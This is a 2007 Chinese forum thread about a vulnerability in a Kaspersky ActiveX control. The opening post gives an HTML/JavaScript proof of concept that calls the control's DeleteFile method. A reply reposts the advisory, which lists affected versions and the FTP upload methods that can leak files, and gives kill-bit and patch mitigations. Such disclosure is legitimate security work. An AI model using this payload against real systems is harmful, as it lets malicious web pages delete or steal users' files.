查看: 4640|回复: 12
收起左侧

卡巴斯基删除任意文件漏洞

[复制链接]
372826096
发表于 2007-5-1 10:26:39 | 显示全部楼层 |阅读模式
  1. <br><font color=#ff0000>卡巴斯基删除任意文件漏洞</font></br>
  2. <br><a href=http://hi.baidu.com/xjworkshop>欢迎访问<<无雪也隆冬>></a></br>
  3. <SCRIPT language=javascript>
  4. function test()
  5. {
  6. bug.DeleteFile("E:\\1.txt");
  7. }
  8. </script>
  9. <object classid="clsid:D9EC22E7-1A86-4F7C-8940-0303AE5D6756" name="bug">
  10.   </object>
  11. <script>javascript:test();</script>
复制代码

[ 本帖最后由 372826096 于 2007-5-1 13:01 编辑 ]
fljoan1
发表于 2007-5-1 10:33:20 | 显示全部楼层
没看懂,请LZ明示
dianshixs
发表于 2007-5-1 10:35:47 | 显示全部楼层
没看懂
372826096
 楼主| 发表于 2007-5-1 10:39:12 | 显示全部楼层
看得懂就看
看不懂看了也没用

[ 本帖最后由 372826096 于 2007-5-1 11:12 编辑 ]
kesong163
发表于 2007-5-1 11:29:59 | 显示全部楼层
HTML代码??
PPwangS
发表于 2007-5-1 12:27:12 | 显示全部楼层
受影响系统:

  Kaspersky Labs Kaspersky Antivirus 6.0

  Kaspersky Labs Kaspersky Internet Security 6.0

  不受影响系统:

  Kaspersky Labs Kaspersky Antivirus 6.0.2.614

  Kaspersky Labs Kaspersky Internet Security 6.0.2.614

  描述:

  Kaspersky Antivirus是非常流行的杀毒软件。

  Kaspersky AntiVirus SysInfo ActiveX控件实现上存在漏洞,恶意网站可能利用此漏洞非授权访问用户系统文件。

  Kaspersky AntiVirus的以下ActiveX控件:

  ProgID:KL.SysInfo

  Clsid:BA61606B-258C-4021-AD27-E07A3F3B91DB

  文件:C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\AxKLSysInfo.dll

  版本:5.0.5.0

  这个控件的StartUploading方式允许恶意的Web脚本执行匿名FTP传输,泄露用户机器上的任意文件。

  此外,AxKLProd60.dll控件(CLSID:D9EC22E7-1A86-4F7C-8940-0303AE5D6756)也存在类似的漏洞。可通过以下方式利用这些控件中的漏洞:

  Function DeleteFile (

          ByVal strFileName As String

      )

  

      Function StartBatchUploading (

          ByVal arrFiles As Variant ,

          ByVal strFTPAddress As String ,

          ByVal strFTPUploadPath As String

      ) As Long

  

      Function StartStrBatchUploading (

          ByVal strFiles As String ,

          ByVal strFTPAddress As String ,

          ByVal strFTPUploadPath As String

      ) As Long

  

      Function StartUploading (

          ByVal strFilePath As String ,

          ByVal strFTPAddress As String ,

          ByVal strFTPUploadPath As String

      ) As Long

  

  <*来源:Peter Vreugdenhil

    链接:http://secunia.com/advisories/24778/

          http://www.kaspersky.com/technews?id=203038694

          http://www.zerodayinitiative.com/advisories/ZDI-07-014.html

          http://labs.idefense.com/intelli ... /display.php?id=504

  *>

  建议:

  临时解决方法:

  * 为该ActiveX控件设置kill-bit。

  厂商补丁:

  Kaspersky Labs

  目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

  http://www.kaspersky.com/productupdates?chapter=186437046

  http://www.kaspersky.com/productupdates?chapter=186435857
天空的蔚蓝
发表于 2007-5-1 12:32:18 | 显示全部楼层
受影响系统:

  Kaspersky Labs Kaspersky Antivirus 6.0

  Kaspersky Labs Kaspersky Internet Security 6.0

  不受影响系统:

  Kaspersky Labs Kaspersky Antivirus 6.0.2.614

  Kaspersky Labs Kaspersky Internet Security 6.0.2.614

这个,请版主说清楚,KAV与KIS的6.0.2.614都属于6.0系列啊,这似乎有点矛盾啊
dllrose
发表于 2007-5-1 13:17:25 | 显示全部楼层
还不错``正准备发的``
wusuobuzai
发表于 2007-5-1 14:24:18 | 显示全部楼层
用6.0.2.621的应该没问题吧?
songgao421
发表于 2007-5-1 18:43:10 | 显示全部楼层
不懂,楼主怎么不说清楚阿?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-25 20:55 , Processed in 0.140137 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表